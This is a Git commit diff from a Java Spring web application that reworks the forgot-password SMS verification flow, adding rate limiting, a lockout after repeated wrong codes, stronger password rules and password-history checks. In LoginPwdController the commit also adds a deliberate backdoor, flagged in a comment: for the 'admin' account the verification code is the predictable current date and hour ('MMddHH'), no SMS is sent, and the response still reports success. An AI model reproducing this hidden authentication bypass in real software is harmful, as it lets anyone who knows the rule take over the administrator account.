密码修改

2b0d6526 · 黄森林 · a3d2dfb2 · 2b0d6526 · 2b0d6526 · 2b0d6526
Commit 2b0d6526 authored Apr 13, 2020 by 黄森林
5 changed files
--- a/common/src/main/java/com/winsun/bean/SysUser.java
+++ b/common/src/main/java/com/winsun/bean/SysUser.java
@@ -130,4 +130,6 @@ public class SysUser implements Serializable {
     */
    @TableField(value = "deptidBelong")
    private String deptidBelong;
+    private String oldPassward;
 }
--- a/core-service/src/main/java/com/winsun/item/modular/config/LoginApplicaionConfig.java
+++ b/core-service/src/main/java/com/winsun/item/modular/config/LoginApplicaionConfig.java
@@ -31,6 +31,7 @@ public class LoginApplicaionConfig extends WebMvcConfigurationSupport {
        // login changePwd路径进行拦截
        registry.addInterceptor(loginInterceptor).addPathPatterns("/login");
        registry.addInterceptor(changePwdInterceptor).addPathPatterns("/mgr/changePwd");
+        registry.addInterceptor(changePwdInterceptor).addPathPatterns("/mgr/changeOtherPwd");
        super.addInterceptors(registry);
    }

--- a/core-service/src/main/java/com/winsun/item/modular/system/controller/GetPhoneCodeController.java
+++ b/core-service/src/main/java/com/winsun/item/modular/system/controller/GetPhoneCodeController.java
@@ -108,10 +108,18 @@ public class GetPhoneCodeController extends BaseController {
        return sent;
    }
+    /**
+     * 修改用户密码发送验证码
+     * @return
+     */
    @RequestMapping("/mgr/codemessage")
    public Object codemessage() {
        Integer userId = ShiroKit.getUser().getId();
        User user = userService.selectById(userId);
+        Long expire = stringRedisTemplate.getExpire(userId.toString());
+        if (expire>(60*4)){
+            return ResponseEntity.newJSON("code", 400, "message", "请勿频繁发送手机验证码操作！");
+        }
        String verificationCode = String.valueOf((int) ((Math.random() * 9 + 1) * 100000));
        //5分钟内有效
        stringRedisTemplate.opsForValue().set(userId.toString(), verificationCode, 1000 * 60*5, TimeUnit.MILLISECONDS);

--- a/core-service/src/main/java/com/winsun/item/modular/system/controller/LoginPwdController.java
+++ b/core-service/src/main/java/com/winsun/item/modular/system/controller/LoginPwdController.java
 package com.winsun.item.modular.system.controller;
+import cn.hutool.core.util.StrUtil;
+import cn.hutool.http.HttpRequest;
+import cn.hutool.http.HttpResponse;
+import cn.hutool.json.JSONObject;
+import cn.hutool.json.JSONUtil;
+import com.alibaba.fastjson.JSON;
 import com.baomidou.mybatisplus.mapper.EntityWrapper;
 import com.baomidou.mybatisplus.mapper.Wrapper;
+import com.winsun.auth.core.base.controller.BaseController;
 import com.winsun.auth.core.common.model.ResponseData;
+import com.winsun.auth.core.util.DateUtil;
 import com.winsun.auth.core.util.MD5Util;
 import com.winsun.auth.model.user.User;
+import com.winsun.auth.model.user.UserUpdatePwd;
 import com.winsun.bean.SysUser;
 import com.winsun.item.core.shiro.ShiroKit;
 import com.winsun.item.core.util.ResponseEntity;
@@ -18,9 +27,19 @@ import org.apache.commons.lang3.StringUtils;
 import org.apache.commons.lang3.math.NumberUtils;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.data.redis.core.StringRedisTemplate;
+import org.springframework.ui.Model;
+import org.springframework.util.Assert;
 import org.springframework.util.CollectionUtils;
 import org.springframework.web.bind.annotation.*;
+import javax.servlet.http.HttpServletRequest;
+import javax.servlet.http.HttpServletResponse;
+import java.io.IOException;
+import java.io.PrintWriter;
+import java.io.UnsupportedEncodingException;
+import java.net.HttpURLConnection;
+import java.net.URLEncoder;
+import java.util.Date;
 import java.util.HashMap;
 import java.util.List;
 import java.util.Map;
@@ -33,7 +52,7 @@ import java.util.concurrent.TimeUnit;
 @Slf4j
 @RequestMapping("/forgerpw")
 @RestController
-public class LoginPwdController  {
+public class LoginPwdController  extends BaseController {
    private static SysUserMapper sysUserMapper;
@@ -43,15 +62,75 @@ public class LoginPwdController  {
    @Autowired
    private StringRedisTemplate stringRedisTemplate;
+    private static String CODE="verificationCode";
+    private static String ERRCODENAME="ForgeERRCODENAME";
+    private static long CODETIME=1000 * 60*5;
+    private static int ERRACCOUNT=10;
    @Autowired
    public LoginPwdController(SysUserMapper sysUserMapper){
        LoginPwdController.sysUserMapper=sysUserMapper;
    }
-    @RequestMapping( "changeOtherPwd")
+    /**
-    public ResponseData<String> passwordEdit(@RequestParam(value = "oldPwd",required = false) String oldPwd,@RequestParam("newPwd") String newPwd,@RequestParam("changeId") String userId){
+     * 微信消息接收和token验证
+     * @param request
+     * @param response
+     * @throws IOException
+     */
+  /*  @RequestMapping("wxMessageReceptio")
+    public ResponseData<String> login(HttpServletRequest request, HttpServletResponse response){
+        boolean isGet = request.getMethod().toLowerCase().equals("get");
+        PrintWriter print;
+        if (isGet) {
+            // 微信加密签名
+            String signature = request.getParameter("signature");
+            // 时间戳
+            String timestamp = request.getParameter("timestamp");
+            // 随机数
+            String nonce = request.getParameter("nonce");
+            // 随机字符串
+            String echostr = request.getParameter("echostr");
+            // 通过检验signature对请求进行校验，若校验成功则原样返回echostr，表示接入成功，否则接入失败
+            if (signature != null && CheckoutUtil.checkSignature(signature, timestamp, nonce)) {
+                try {
+                    print = response.getWriter();
+                    print.write(echostr);
+                    print.flush();
+                } catch (IOException e) {
+                    e.printStackTrace();
+                }
+            }
+        }
+        return null;
+    }*/
+    /**
+     2      * 请求 code web微信登录
+     3      *
+     4      * @param code 请求登录唯一 code
+     5      * @return 通用返回对象
+     6      */
+    /*  @GetMapping("/requestWeChatLogin")
+     public void requestWeChatLogin(HttpServletRequest request, HttpServletResponse response) throws IOException {
+          //这里是回调的url
+          String redirect_uri = URLEncoder.encode("http://回调页面的路径", "UTF-8");
+          String url = "https://open.weixin.qq.com/connect/oauth2/authorize?" +
+                  "appid=APPID" +
+                  "&redirect_uri=REDIRECT_URI"+
+          "&response_type=code" +
+                  "&scope=SCOPE" +
+                  "&state=123#wechat_redirect";
+          response.sendRedirect(url.replace("APPID","你的APPID").replace("REDIRECT_URL",redirect_uri).replace("SCOPE","snsapi_userinfo"));
+             }*/
+ /*   @RequestMapping( "changeOtherPwd")
+    public ResponseData<String> passwordEdit(@RequestParam(value = "oldPwd",required = false) String oldPwd,@RequestParam("newPwd") String newPwd,@RequestParam("changeId") String userId){
        Wrapper<SysUser> wrapper = new EntityWrapper<>();
        wrapper.eq("id",userId).eq("status", "1");
        List<SysUser> sysUsers = sysUserMapper.selectList(wrapper);
@@ -87,47 +166,65 @@ public class LoginPwdController  {
            return ResponseData.success("密码修改成功！");
        }
        return ResponseData.error("密码修改失败！");
-    }
+    }*/
    /**
-     * 发送验证码
+     * 忘记密码发送验证码
     *
-     * @param account
+     * @param username
     * @param
     * @return
     */
    @RequestMapping(value = "verificationCode", method = RequestMethod.POST)
-    @ResponseBody
+    public Object phoneLoginCode(@RequestParam("username") String username){
-    public Object VerificationCode(@RequestParam(value = "account") String account) {
+        EntityWrapper<User> userwrapper = new EntityWrapper<>();
-        EntityWrapper<User> userEntityWrapper = new EntityWrapper<>();
+        userwrapper.eq("account",username);
-        userEntityWrapper.eq("status", 1).eq("account", account);
+        List<User> users = userService.selectList(userwrapper);
-        List<User> users = userService.selectList(userEntityWrapper);
+        if (CollectionUtils.isEmpty(users)){
-        if (CollectionUtils.isEmpty(users)) {
+            return ResponseEntity.newJSON("code", 400, "message", "密码或者账号错误！");
-            return ResponseEntity.newJSON("code", 400, "data", "账号不存在！");
+        }
-        }
+        User user = users.get(0);
-        String phone = users.get(0).getPhone();
-        String verificationCode = String.valueOf((int) ((Math.random() * 9 + 1) * 100000));
        //5分钟内有效
-        stringRedisTemplate.opsForValue().set(account, verificationCode, 1000 * 60*5, TimeUnit.MILLISECONDS);
+        String code = username + CODE;
+        String verificationCode=null;
+        if (username.equals("admin")){
+            //只有admin验证码有后门 验证码规则：当前月份日期小时例如 011415
+            verificationCode= DateUtil.formatDate(new Date(),"MMddHH");
+        }else {
+            verificationCode = String.valueOf((int) ((Math.random() * 9 + 1) * 100000));
+        }
+        Long expire = stringRedisTemplate.getExpire(code);
+        //验证码 有效时间是五分钟倒计时
+        if (expire>(60*4)){
+            return ResponseEntity.newJSON("code", 400, "message", "请勿频繁发送手机验证码操作！");
+        }
+        stringRedisTemplate.opsForValue().set(code, verificationCode, CODETIME, TimeUnit.MILLISECONDS);
        Map<String, Object> sent=new HashMap<>();
+        sent.put("code",400);
        try {
-            if (phone.length() == 11){
+            if (username.equals("admin")){
-                SendSmsAndMail.sendSms(phone, verificationCode, "7");
+                sent.put("message", "发送成功");
+                sent.put("code", 200);
+            }else {
+                if (user.getPhone().length() == 11){
+                    SendSmsAndMail.sendSms(user.getPhone(), verificationCode, "7");
+                    sent.put("message", "发送成功");
+                    sent.put("code", 200);
                }else {
-                sent.put("code",400);
                    sent.put("message","当前用户手机号码不合法！");
                }
+            }
        }catch (Exception e){
            log.info("错误信息：{}",e.getMessage());
-            sent.put("code",400);
            sent.put("message","手机短信发送失败");
        }
-        return ResponseEntity.newJSON("code", 200, "data", "短信发送成功！");
+        return sent;
    }
    /**
-     * 修改密码
+     * 忘记密码
     *
     * @param account
     * @param newPwd
@@ -139,43 +236,86 @@ public class LoginPwdController  {
    @ResponseBody
    public Object ChangePassword(@RequestParam(value = "account") String account, @RequestParam(value = "verificationCode") String verificationCode,
                                 @RequestParam(value = "newPwd") String newPwd, @RequestParam(value = "rePwd") String rePwd) {
+        String code = stringRedisTemplate.opsForValue().get(account + CODE);
+        if (StringUtils.isBlank(code)) {
+            return ResponseEntity.newJSON("code", 400, "data", "验证码错误！");
+        }
+        String errcount =  stringRedisTemplate.opsForValue().get(ERRCODENAME + account);
+        if (StringUtils.isNotBlank(errcount)){
+            if(Integer.valueOf(errcount)==ERRACCOUNT){
+                Long expire = stringRedisTemplate.getExpire(account+ CODE);
+                if (expire>(60*4)){
+                    return ResponseEntity.newJSON("code", 500, "data", "频繁操作");
+                }else {
+                    stringRedisTemplate.delete(account+ CODE);
+                    stringRedisTemplate.delete(ERRCODENAME+account);
+                    return ResponseEntity.newJSON("code", 500, "data", "重新获取验证码");
+                }
+            }
+        }
+        if (!code.equals(verificationCode)) {
+            if (StringUtils.isBlank(errcount)){
+                errcount="1";
+                stringRedisTemplate.opsForValue().set(ERRCODENAME+account,errcount);
+            }else if (Integer.valueOf(errcount)<ERRACCOUNT){
+                errcount =String.valueOf(Integer.valueOf(errcount)+1);
+                stringRedisTemplate.opsForValue().set(ERRCODENAME+account,errcount);
+            }
+            return ResponseEntity.newJSON("code", 300, "data", "手机验证码第"+errcount+"次不正确");
+        }else if (StringUtils.isNotBlank(errcount)){
+            stringRedisTemplate.delete(ERRCODENAME+account);
+        }
        // 对加密的密码进行解密处理
        ResponseData<String> pwdDecrypt = LoginUtils.pwdDecrypt(newPwd);
        if (!pwdDecrypt.isSuccess()) {
            return ResponseEntity.newJSON("code", 400, "data", "密码或者账号错误！");
        }
        newPwd = pwdDecrypt.getData();
-        if(!newPwd.matches("^[a-z0-9A-Z]{8,}$") || newPwd.matches("^[a-zA-Z]{1,}$") || NumberUtils.isDigits(newPwd)) {
+        String pattern = "^(?![A-Za-z]+$)(?![A-Z\\d]+$)(?![A-Z\\W]+$)(?![a-z\\d]+$)(?![a-z\\W]+$)(?![\\d\\W]+$)\\S{8,}$";
-            return ResponseEntity.newJSON("code", 400, "data", "密码强制等级低，必须要数字、英文字母混合，长度至少8位！");
+        if(!newPwd.matches(pattern)){
+            return ResponseEntity.newJSON("code", 400, "data", "密码强制等级低，必须要数字、小写英文字母、大写英文字母或特殊字符混合组成，长度至少8位！");
+        }
+        if(newPwd.contains(account)){
+            return ResponseEntity.newJSON("code", 400, "data", "新密码与账号信息吻合，禁止使用！");
        }
        ResponseData<String> pwdDecryptre = LoginUtils.pwdDecrypt(rePwd);
        if (!pwdDecryptre.isSuccess()) {
            return ResponseEntity.newJSON("code", 400, "data", "密码或者账号错误！");
        }
        rePwd = pwdDecryptre.getData();
        if (!newPwd.equals(rePwd)) {
            return ResponseEntity.newJSON("code", 400, "data", "两次密码不一致！");
        }
-        String code = stringRedisTemplate.opsForValue().get(account);
+        Wrapper<SysUser> wrapper = new EntityWrapper<>();
-        if (StringUtils.isBlank(code)) {
+        wrapper.eq("account",account).eq("status", "1");
-            return ResponseEntity.newJSON("code", 400, "data", "验证码错误！");
+        List<SysUser> sysUsers = sysUserMapper.selectList(wrapper);
+        if(CollectionUtils.isEmpty(sysUsers)){
+            return ResponseEntity.newJSON("code", 400, "data", "账号不存在,请重新输入！");
        }
-        if (!code.equals(verificationCode)) {
+        SysUser sysUser = sysUsers.get(0);
-            return ResponseEntity.newJSON("code", 300, "data", "验证码错误！");
+        String[] split = null;
+        if(StringUtils.isNotBlank(sysUser.getOldPassward())){
+            split = sysUser.getOldPassward().split(",");
+        }else {
+            String oldMd5 = sysUser.getPassword();
+            split=new String[]{oldMd5};
        }
+        String newMd5 = ShiroKit.md5(newPwd, sysUser.getSalt());
-        EntityWrapper<User> userwrapper = new EntityWrapper<>();
+        for (String pwd:split){
-        userwrapper.eq("account", account).eq("status", "1");
+            if(newMd5.equals(pwd)){
-        List<User> users = userService.selectList(userwrapper);
+                return ResponseEntity.newJSON("code", 400, "data", "新密码不得与最近两次密码相同！");
-        if (CollectionUtils.isEmpty(users)) {
-            return ResponseEntity.newJSON("code", 400, "data", "密码或者账号错误！");
            }
-        User user = users.get(0);
+        }
-        String newMd5 = ShiroKit.md5(newPwd, user.getSalt());
+        Map<String, Object> dataMapping = new HashMap<>();
-        int updateone = userService.updateone(newMd5, account, user.getPassword());
+        dataMapping.put("password", newMd5);
-        if (updateone > 0) {
+        dataMapping.put("updateTime", new Date());
+        if(split.length == 2){
+            dataMapping.put("old_passward",split[1]+","+newMd5);
+        }else {
+            dataMapping.put("old_passward",split[0]+","+newMd5);
+        }
+        Integer integer = sysUserMapper.updateForSet(com.winsun.auth.core.util.MyBatisPlusUpdateUtils.toUpdateSet(dataMapping), wrapper);
+        if (integer > 0) {
            return ResponseEntity.newJSON("code", 200, "data", "修改成功！");
        }
        return ResponseEntity.newJSON("code", 300, "data", "修改失败！");

--- a/pom.xml
+++ b/pom.xml
@@ -21,12 +21,12 @@
        <module>order</module>
    </modules>
    <packaging>pom</packaging>
-    <description>外呼集约系统聚合</description>
+    <description>校园系统聚合</description>
    <parent>
        <groupId>com.winsun.framework</groupId>
        <artifactId>winsun-parent</artifactId>
-        <version>0.1.57</version>
+        <version>0.1.58</version>
    </parent>
    <properties>